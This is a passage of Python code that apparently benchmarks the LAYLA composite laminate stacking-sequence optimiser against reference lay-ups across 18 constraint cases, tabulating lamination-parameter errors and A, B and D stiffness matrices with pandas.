0]),\r\n np.array([-0.1519, -0.0621, 0, 0,\r\n 0, 0, 0, 0,\r\n 0.0437, -0.79, -0.0233, 0]),\r\n np.array([-0.1196, -0.0585, 0, 0,\r\n 0, 0, 0, 0,\r\n 0.0483, -0.721, -0.0196, 0])\r\n ]\r\n\r\nssK = [\r\n np.array([-45, -45, 45, -45, 45, 45, 0, 0, 45, 90, 90, 90, 90, 45, 90, 90, 90, 90, 90, 0, -45, 0, -45, 45, -45, -45, 45, 45], int),\r\n np.array([45, -45, 45, -45, -45, 45, -45, 0, 0, 90, 90, 90, 90, 90, 90, 90, 90, 90, 90, 0, 0, -45, 45, -45, -45, 45, -45, 45], int),\r\n np.array([45, -45, -45, 45, -45, 45, 0, -45, 45, 90, 90, 0, 90, 90, 90, 90, 0, 90, 90, 45, -45, 0, 45, -45, 45, -45, -45, 45 ], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n\r\n np.array([45, -45, -45, -45, 45, 45, 45, 0, 0, -45, 90, 45, 90, 90, 90, 90, 45, 90, -45, 0, 0, 45, 45, 45, -45, -45, -45, 45], int),\r\n np.array([45, -45, -45, -45, 45, 45, 45, 0, 0, -45, 90, 45, 90, 90, 90, 90, 45, 90, -45, 0, 0, 45, 45, 45, -45, -45, -45, 45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, 45, 90, -45, 90, -45, 0, 0, -45, 90, -45, 90, 45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 45, 0, -45, 90, 90, 90, -45, 0, 45, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, 45, 45, -45, 45, -45, 0, -45, 0, 45, 90, 90, 90, 90, 90, 90, 90, 0, 0, 90, 45, 45, -45, 45, -45, -45, -45, 45], int),\r\n\r\n np.array([-45, 45, -45, 45, 45, -45, 0, 45, -45, 90, 0, 90, 90, 90, 90, 90, 90, 0, 90, -45, 45, 0, -45, 45, 45, -45, 45, -45], int),\r\n np.array([-45, 45, -45, 45, 45, -45, 0, 45, -45, 90, 90, 0, 90, 90, 90, 90, 0, 90, 90, -45, 45, 0, -45, 45, 45, -45, 45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([45, -45, -45, 45, 45, -45, 0, -45, 0, 90, 90, 90, 90, 45, 45, 90, 90, 90, 90, 0, -45, 0, -45, 45, 45, -45, -45, 45], int),\r\n\r\n np.array([45, -45, -45, 45, 45, -45, 0, -45, 0, 90, 90, 90, 90, 45, 45, 90, 90, 90, 90, 0, -45, 0, -45, 45, 45, -45, -45, 45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n ]\r\n\r\nfor i in range(18):\r\n\r\n print('\\n ipop', i)\r\n\r\n comment = comments[i]\r\n time_global_layerwise = timesK[i]\r\n n_plies = ply_counts[i]\r\n lampamK = calc_lampam(ssK[i])\r\n\r\n if i == 0: # 'Normal'\r\n lampam_target = lampam_targets[0]\r\n constraints = Constraints(\r\n sym=False,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 1: # 'Symmetric'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n 
dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 2: # 'Sym + contiguity'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 3 or i == 4: # 'Sym + disorientation'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=True,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 5: # 'Sym + 10%'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 6: # 'Sym + 10% + contiguity + damtol'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=True,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 7 or i == 8: # 'Sym + 10% + contiguity + damtol + disorientation'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=True,\r\n diso=True,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 9: # 'Balanced'\r\n lampam_target = lampam_targets[3]\r\n constraints = Constraints(\r\n sym=False,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n 
set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 10: # 'Sym + bal'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 11: # 'Sym + bal + contiguity'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 12 or i == 13: # 'Sym + bal + disorientation'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=True,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 14: # 'Sym + bal + 10%'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 15: # 'Sym + bal + 10% + contiguity + damtol'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=True,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 16 or i == 17: # 'Sym + bal + 10% + contiguity + damtol + diso'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=True,\r\n diso=True,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n\r\n targets = Targets(n_plies=ply_counts[i], lampam=lampam_target)\r\n parameters = Parameters(\r\n constraints=constraints,\r\n coeff_10=coeff_10,\r\n coeff_bal_ipo=coeff_bal_ipo,\r\n coeff_oopo=coeff_oopo,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n 
n_D3=n_D3,\r\n n_outer_step=n_outer_step,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n first_level_sensitivities=first_level_sensitivities,\r\n lampam_to_be_optimised=lampam_to_be_optimised,\r\n global_node_limit=global_node_limit,\r\n local_node_limit=local_node_limit,\r\n global_node_limit_p=global_node_limit_p,\r\n local_node_limit_final=local_node_limit_final,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n penalty_10_pc_switch=penalty_10_pc_switch,\r\n penalty_ipo_switch=penalty_ipo_switch,\r\n penalty_bal_switch=penalty_bal_switch,\r\n type_obj_func=1)\r\n #print(parameters)\r\n\r\n t = time.time()\r\n result = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\n elapsed1 = time.time() - t\r\n\r\n\r\n check_lay_up_rules(result.ss, constraints)\r\n check_lay_up_rules(ssK[i], constraints)\r\n\r\n\r\n print('Time', elapsed1)\r\n print('objective with modified lamination parameter weightings',\r\n result.objective)\r\n\r\n table_result = pd.DataFrame()\r\n\r\n# # number of the outer loop with the best results\r\n# table_result.loc[0, 'best outer loop'] \\\r\n# = result.n_outer_step_best_solution\r\n#\r\n# # Number of iterations\r\n# table_result.loc[0, 'n_outer_step_performed'] \\\r\n# = result.number_of_outer_steps_performed\r\n\r\n table_result.loc[0, 'constraints'] = comments[i]\r\n\r\n # Laminate ply count\r\n table_result.loc[0 + 0, 'Ply count'] = np.NaN\r\n table_result.loc[0 + 1, 'Ply count'] = ssK[i].size\r\n table_result.loc[0 + 2, 'Ply count'] = result.ss.size\r\n\r\n # objective\r\n table_result.loc[\r\n 0 + 0, 'objective with initial lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n 0 + 1, 'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=lampamK,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n table_result.loc[\r\n 0 + 2, 'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=result.lampam,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n\r\n table_result.loc[\r\n 0 + 0, 'objective with modified lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n 0 + 1, 'objective with modified lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=lampamK,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_final,\r\n constraints=constraints,\r\n parameters=parameters)\r\n table_result.loc[\r\n 0 + 2, 'objective with modified lamination parameter weightings'] \\\r\n = result.objective\r\n\r\n# # Inhomogeneity factor\r\n# table_result.loc[0, 'target inhomogeneity factor'] \\\r\n# = np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n#\r\n# # objectives\r\n# for k in range(parameters.n_outer_step):\r\n# table_result.loc[\r\n# 0, f'objective iteration {k+1}'] = result.obj_tab[k]\r\n\r\n # Computational time in s\r\n table_result.loc[0 + 0, 'time (s)'] = np.NaN\r\n table_result.loc[0 + 1, 'time (s)'] = timesK[i]\r\n table_result.loc[0 + 2, 'time (s)'] = elapsed1\r\n\r\n # lampam_target\r\n table_result.loc[0 + 0, 'information'] = 'lampam_target'\r\n table_result.loc[0 + 0, 'index 1'] = lampam_target[0]\r\n table_result.loc[0 + 0, 'index 2'] = lampam_target[1]\r\n table_result.loc[0 + 0, 'index 3'] = 
lampam_target[2]\r\n table_result.loc[0 + 0, 'index 4'] = lampam_target[3]\r\n table_result.loc[0 + 0, 'index 5'] = lampam_target[4]\r\n table_result.loc[0 + 0, 'index 6'] = lampam_target[5]\r\n table_result.loc[0 + 0, 'index 7'] = lampam_target[6]\r\n table_result.loc[0 + 0, 'index 8'] = lampam_target[7]\r\n table_result.loc[0 + 0, 'index 9'] = lampam_target[8]\r\n table_result.loc[0 + 0, 'index 10'] = lampam_target[9]\r\n table_result.loc[0 + 0, 'index 11'] = lampam_target[10]\r\n table_result.loc[0 + 0, 'index 12'] = lampam_target[11]\r\n\r\n table_result.loc[0 + 1, 'information'] = 'LP errors Kennedy'\r\n table_result.loc[0 + 1, 'index 1'] \\\r\n = abs(lampam_target[0] - lampamK[0])\r\n table_result.loc[0 + 1, 'index 2'] \\\r\n = abs(lampam_target[1] - lampamK[1])\r\n table_result.loc[0 + 1, 'index 3'] \\\r\n = abs(lampam_target[2] - lampamK[2])\r\n table_result.loc[0 + 1, 'index 4'] \\\r\n = abs(lampam_target[3] - lampamK[3])\r\n table_result.loc[0 + 1, 'index 5'] \\\r\n = abs(lampam_target[4] - lampamK[4])\r\n table_result.loc[0 + 1, 'index 6'] \\\r\n = abs(lampam_target[5] - lampamK[5])\r\n table_result.loc[0 + 1, 'index 7'] \\\r\n = abs(lampam_target[6] - lampamK[6])\r\n table_result.loc[0 + 1, 'index 8'] \\\r\n = abs(lampam_target[7] - lampamK[7])\r\n table_result.loc[0 + 1, 'index 9'] \\\r\n = abs(lampam_target[8] - lampamK[8])\r\n table_result.loc[0 + 1, 'index 10'] \\\r\n = abs(lampam_target[9] - lampamK[9])\r\n table_result.loc[0 + 1, 'index 11'] \\\r\n = abs(lampam_target[10] - lampamK[10])\r\n table_result.loc[0 + 1, 'index 12'] \\\r\n = abs(lampam_target[11] - lampamK[11])\r\n\r\n table_result.loc[0 + 2, 'information'] = 'LP errors LAYLA'\r\n table_result.loc[0 + 2, 'index 1'] \\\r\n = abs(lampam_target[0] - result.lampam[0])\r\n table_result.loc[0 + 2, 'index 2'] \\\r\n = abs(lampam_target[1] - result.lampam[1])\r\n table_result.loc[0 + 2, 'index 3'] \\\r\n = abs(lampam_target[2] - result.lampam[2])\r\n table_result.loc[0 + 2, 'index 4'] \\\r\n = abs(lampam_target[3] - result.lampam[3])\r\n table_result.loc[0 + 2, 'index 5'] \\\r\n = abs(lampam_target[4] - result.lampam[4])\r\n table_result.loc[0 + 2, 'index 6'] \\\r\n = abs(lampam_target[5] - result.lampam[5])\r\n table_result.loc[0 + 2, 'index 7'] \\\r\n = abs(lampam_target[6] - result.lampam[6])\r\n table_result.loc[0 + 2, 'index 8'] \\\r\n = abs(lampam_target[7] - result.lampam[7])\r\n table_result.loc[0 + 2, 'index 9'] \\\r\n = abs(lampam_target[8] - result.lampam[8])\r\n table_result.loc[0 + 2, 'index 10'] \\\r\n = abs(lampam_target[9] - result.lampam[9])\r\n table_result.loc[0 + 2, 'index 11'] \\\r\n = abs(lampam_target[10] - result.lampam[10])\r\n table_result.loc[0 + 2, 'index 12'] \\\r\n = abs(lampam_target[11] - result.lampam[11])\r\n\r\n# # Retrieved stacking sequence at step 1\r\n# ss_flatten = np.array(result.ss_tab[0], dtype=str)\r\n# ss_flatten = ' '.join(ss_flatten)\r\n# table_result.loc[0, 'ss retrieved at step 1'] = ss_flatten\r\n\r\n # Retrieved stacking sequence\r\n table_result.loc[0 + 0, 'stacking sequence'] = np.NaN\r\n ss_flattenK = np.array(ssK[i], dtype=str)\r\n ss_flattenK = ' '.join(ss_flattenK)\r\n table_result.loc[0 + 1, 'stacking sequence'] = ss_flattenK\r\n ss_flatten = np.array(result.ss, dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[0 + 2, 'stacking sequence'] = ss_flatten\r\n\r\n\r\n# # Target stacking sequence\r\n# table_result.loc[0, 'ss target'] = np.NaN\r\n\r\n# # Ply counts\r\n# table_result.loc[0, 'N0_target'] = np.NaN\r\n# table_result.loc[0, 'N90_target'] 
= np.NaN\r\n# table_result.loc[0, 'N45_target'] = np.NaN\r\n# table_result.loc[0, 'N-45_target'] = np.NaN\r\n# N0 = sum(result.ss == 0)\r\n# N90 = sum(result.ss == 90)\r\n# N45 = sum(result.ss == 45)\r\n# N135 = sum(result.ss == -45)\r\n# table_result.loc[0, 'N0 - N0_target'] = np.NaN\r\n# table_result.loc[0, 'N90 - N90_target'] = np.NaN\r\n# table_result.loc[0, 'N45 - N45_target'] = np.NaN\r\n# table_result.loc[0, 'N-45 - N-45_target'] = np.NaN\r\n# table_result.loc[0, 'penalty value for the 10% rule'] \\\r\n# = calc_penalty_10_ss(result.ss, constraints)\r\n\r\n# for ind in range(n_outer_step):\r\n# # numbers of stacks at the last level of the last group search\r\n# table_result.loc[0, 'n_designs_last_level ' + str(ind + 1)] \\\r\n# = result.n_designs_last_level_tab[ind]\r\n# # numbers of repaired stacks at the last group search\r\n# table_result.loc[0, 'n_designs_repaired ' + str(ind + 1)] \\\r\n# = result.n_designs_repaired_tab[ind]\r\n# # numbers of unique repaired stacks at the last group search\r\n# table_result.loc[0, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n# = result.n_designs_repaired_unique_tab[ind]\r\n\r\n# # in-plane orthotropy\r\n# ipo_now = ipo_param_1_12(result.lampam, mat_prop, constraints.sym)\r\n# table_result.loc[0, 'In-plane orthotropy parameter 1'] = ipo_now[0]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 2'] = ipo_now[1]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 3'] = ipo_now[2]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 4'] = ipo_now[3]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 5'] = ipo_now[4]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 6'] = ipo_now[5]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 7'] = ipo_now[6]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 8'] = ipo_now[7]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 9'] = ipo_now[8]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 10'] = ipo_now[9]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 11'] = ipo_now[10]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 12'] = ipo_now[11]\r\n\r\n AK = A_from_lampam(lampamK, mat_prop)\r\n A11K = AK[0, 0]\r\n A22K = AK[1, 1]\r\n A12K = AK[0, 1]\r\n A66K = AK[2, 2]\r\n A16K = AK[0, 2]\r\n A26K = AK[1, 2]\r\n\r\n BK = B_from_lampam(lampamK, mat_prop)\r\n B11K = BK[0, 0]\r\n B22K = BK[1, 1]\r\n B12K = BK[0, 1]\r\n B66K = BK[2, 2]\r\n B16K = BK[0, 2]\r\n B26K = BK[1, 2]\r\n\r\n DK = D_from_lampam(lampamK, mat_prop)\r\n D11K = DK[0, 0]\r\n D22K = DK[1, 1]\r\n D12K = DK[0, 1]\r\n D66K = DK[2, 2]\r\n D16K = DK[0, 2]\r\n D26K = DK[1, 2]\r\n\r\n A = A_from_lampam(result.lampam, mat_prop)\r\n A11 = A[0, 0]\r\n A22 = A[1, 1]\r\n A12 = A[0, 1]\r\n A66 = A[2, 2]\r\n A16 = A[0, 2]\r\n A26 = A[1, 2]\r\n\r\n B = B_from_lampam(result.lampam, mat_prop)\r\n B11 = B[0, 0]\r\n B22 = B[1, 1]\r\n B12 = B[0, 1]\r\n B66 = B[2, 2]\r\n B16 = B[0, 2]\r\n B26 = B[1, 2]\r\n\r\n D = D_from_lampam(result.lampam, mat_prop)\r\n D11 = D[0, 0]\r\n D22 = D[1, 1]\r\n D12 = D[0, 1]\r\n D66 = D[2, 2]\r\n D16 = D[0, 2]\r\n D26 = D[1, 2]\r\n\r\n A_target = A_from_lampam(lampam_target, mat_prop)\r\n A11_target = A_target[0, 0]\r\n A22_target = A_target[1, 1]\r\n A12_target = A_target[0, 1]\r\n A66_target = A_target[2, 2]\r\n A16_target = A_target[0, 2]\r\n A26_target = A_target[1, 2]\r\n\r\n B_target = B_from_lampam(lampam_target, mat_prop)\r\n B11_target = B_target[0, 0]\r\n B22_target = B_target[1, 1]\r\n B12_target = B_target[0, 1]\r\n B66_target = B_target[2, 2]\r\n B16_target = 
B_target[0, 2]\r\n B26_target = B_target[1, 2]\r\n\r\n D_target = D_from_lampam(lampam_target, mat_prop)\r\n D11_target = D_target[0, 0]\r\n D22_target = D_target[1, 1]\r\n D12_target = D_target[0, 1]\r\n D66_target = D_target[2, 2]\r\n D16_target = D_target[0, 2]\r\n D26_target = D_target[1, 2]\r\n\r\n table_result.loc[0 + 0, 'stifnesses'] = 'targets'\r\n table_result.loc[0 + 0, 'A11'] = A11_target\r\n table_result.loc[0 + 0, 'A22'] = A22_target\r\n table_result.loc[0 + 0, 'A12'] = A12_target\r\n table_result.loc[0 + 0, 'A66'] = A66_target\r\n table_result.loc[0 + 0, 'A16'] = A16_target\r\n table_result.loc[0 + 0, 'A26'] = A26_target\r\n\r\n table_result.loc[0 + 0, 'B11'] = B11_target\r\n table_result.loc[0 + 0, 'B22'] = B22_target\r\n table_result.loc[0 + 0, 'B12'] = B12_target\r\n table_result.loc[0 + 0, 'B66'] = B66_target\r\n table_result.loc[0 + 0, 'B16'] = B16_target\r\n table_result.loc[0 + 0, 'B26'] = B26_target\r\n\r\n table_result.loc[0 + 0, 'D11'] = D11_target\r\n table_result.loc[0 + 0, 'D22'] = D22_target\r\n table_result.loc[0 + 0, 'D12'] = D12_target\r\n table_result.loc[0 + 0, 'D66'] = D66_target\r\n table_result.loc[0 + 0, 'D16'] = D16_target\r\n table_result.loc[0 + 0, 'D26'] = D26_target\r\n\r\n table_result.loc[0 + 1, 'stifnesses'] = 'Kennedy'\r\n table_result.loc[0 + 1, 'A11'] = A11K\r\n table_result.loc[0 + 1, 'A22'] = A22K\r\n table_result.loc[0 + 1, 'A12'] = A12K\r\n table_result.loc[0 + 1, 'A66'] = A66K\r\n table_result.loc[0 + 1, 'A16'] = A16K\r\n table_result.loc[0 + 1, 'A26'] = A26K\r\n\r\n table_result.loc[0 + 1, 'B11'] = B11K\r\n table_result.loc[0 + 1, 'B22'] = B22K\r\n table_result.loc[0 + 1, 'B12'] = B12K\r\n table_result.loc[0 + 1, 'B66'] = B66K\r\n table_result.loc[0 + 1, 'B16'] = B16K\r\n table_result.loc[0 + 1, 'B26'] = B26K\r\n\r\n table_result.loc[0 + 1, 'D11'] = D11K\r\n table_result.loc[0 + 1, 'D22'] = D22K\r\n table_result.loc[0 + 1, 'D12'] = D12K\r\n table_result.loc[0 + 1, 'D66'] = D66K\r\n table_result.loc[0 + 1, 'D16'] = D16K\r\n table_result.loc[0 + 1, 'D26'] = D26K\r\n\r\n table_result.loc[0 + 2, 'stifnesses'] = 'LAYLA'\r\n table_result.loc[0 + 2, 'A11'] = A11\r\n table_result.loc[0 + 2, 'A22'] = A22\r\n table_result.loc[0 + 2, 'A12'] = A12\r\n table_result.loc[0 + 2, 'A66'] = A66\r\n table_result.loc[0 + 2, 'A16'] = A16\r\n table_result.loc[0 + 2, 'A26'] = A26\r\n\r\n table_result.loc[0 + 2, 'B11'] = B11\r\n table_result.loc[0 + 2, 'B22'] = B22\r\n table_result.loc[0 + 2, 'B12'] = B12\r\n table_result.loc[0 + 2, 'B66'] = B66\r\n table_result.loc[0 + 2, 'B16'] = B16\r\n table_result.loc[0 + 2, 'B26'] = B26\r\n\r\n table_result.loc[0 + 2, 'D11'] = D11\r\n table_result.loc[0 + 2, 'D22'] = D22\r\n table_result.loc[0 + 2, 'D12'] = D12\r\n table_result.loc[0 + 2, 'D66'] = D66\r\n table_result.loc[0 + 2, 'D16'] = D16\r\n table_result.loc[0 + 2, 'D26'] = D26\r\n\r\n# if A11_target:\r\n# table_result.loc[0 + 1, 'diff A11 percentage']\\\r\n# = 100 * abs((A11K - A11_target)/A11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A11 percentage'] = 0\r\n# if A22_target:\r\n# table_result.loc[0 + 1, 'diff A22 percentage']\\\r\n# = 100 * abs((A22K - A22_target)/A22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A22 percentage'] = 0\r\n# if A12_target:\r\n# table_result.loc[0 + 1, 'diff A12 percentage']\\\r\n# = 100 * abs((A12K - A12_target)/A12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A12 percentage'] = 0\r\n# if A66_target:\r\n# table_result.loc[0 + 1, 'diff A66 percentage']\\\r\n# = 100 * abs((A66K - A66_target)/A66_target)\r\n# 
else:\r\n# table_result.loc[0 + 1, 'diff A66 percentage'] = 0\r\n# if A16_target:\r\n# table_result.loc[0 + 1, 'diff A16 percentage']\\\r\n# = 100 * abs((A16K - A16_target)/A16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A16 percentage'] = 0\r\n# if A26_target:\r\n# table_result.loc[0 + 1, 'diff A26 percentage']\\\r\n# = 100 * abs((A26K - A26_target)/A26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A26 percentage'] = 0\r\n#\r\n# if B11_target:\r\n# table_result.loc[0 + 1, 'diff B11 percentage']\\\r\n# = 100 * abs((B11K - B11_target)/B11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B11 percentage'] = 0\r\n# if B22_target:\r\n# table_result.loc[0 + 1, 'diff B22 percentage']\\\r\n# = 100 * abs((B22K - B22_target)/B22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B22 percentage'] = 0\r\n# if B12_target:\r\n# table_result.loc[0 + 1, 'diff B12 percentage']\\\r\n# = 100 * abs((B12K - 